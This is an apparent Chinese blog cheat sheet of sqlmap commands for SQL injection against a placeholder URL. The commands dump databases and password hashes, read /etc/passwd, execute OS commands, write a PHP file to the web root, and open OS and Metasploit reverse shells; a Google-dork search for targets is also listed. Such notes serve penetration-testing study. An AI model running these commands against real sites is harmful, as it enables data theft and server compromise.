SQLMAP使用笔记

注入 分法不同,种类不同,先简单的分下类:
1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x”
获取数据库
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs
得到库名后获取表
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 --tables
获取字段
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 -T 表名 --columns
获取字段内容
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 -T 表名 -C "字段1,字段2" --dump
查看当前用户
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --current-user 


查看当前连接的数据库
sqlmap -u "http://xxx.xx.xxx/xx.xxx?xx=x"  --current-db
列数据库用户
sqlmap -u "http://xxx.xx.xxx/xx.xxx?xx=x"  --users
判断当前用户是否是dba 
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --is-dba
列举数据库用户密码 和指定用户密码
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x”  --passwords
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x”  --passwords -U sa
查看用户权限和指定用户的权限
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --privileges


sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --privileges -U root
读取系统文件
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --file-read /etc/passwd
执行系统命令 
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-cmd=whoami 
写入文件到web
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” –file-write /localhost/mm.php –file-dest /var/www/html/xx.php -v 2
系统交互shell 
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-shell 
反弹shell 需要指定msf的安装路径
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-pwn -msf-path=/usr/share/metasploit-framework/
执行指定的sql语句查询
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” –sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″
读取win系统注册表
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --reg-read 
执行系统命令
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-cmd=whoami
保存进度 
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs -o “sqlmap.log” 
恢复已保存进度
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs -o “sqlmap.log” --resume 
指定数据库,绕过SQLMAP的自动检测 
sqlmap -u “; -v 2 --dbms “PostgreSQL” 
* MySQL 
* Oracle 
* PostgreSQL 
* Microsoft SQL Server 
指定操作系统,绕过SQLMAP自动检测 
sqlmap -u “; -v 2 --os “Windows”
* Linux 
* Windows 
google搜索引擎的使用
sqlmap -g "site:xx.xxx inurl:xxx"
-v #详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容


2.post型: sqlmap -u “http://xxx.xx.xxx/xx.x” --data=”xxxx=xxxx&xxxx=xxx”
sqlmap -u “http://xxx.xx.xxx/xx.x” -r "POST数据"
3.cookie类注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --cookie=”xxx=xxx&xxx=xxx”
sqlmap 使用可以参考
http://drops.wooyun.org/tips/143
https://github.com/sqlmapproject/sqlmap/wiki/Usage
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值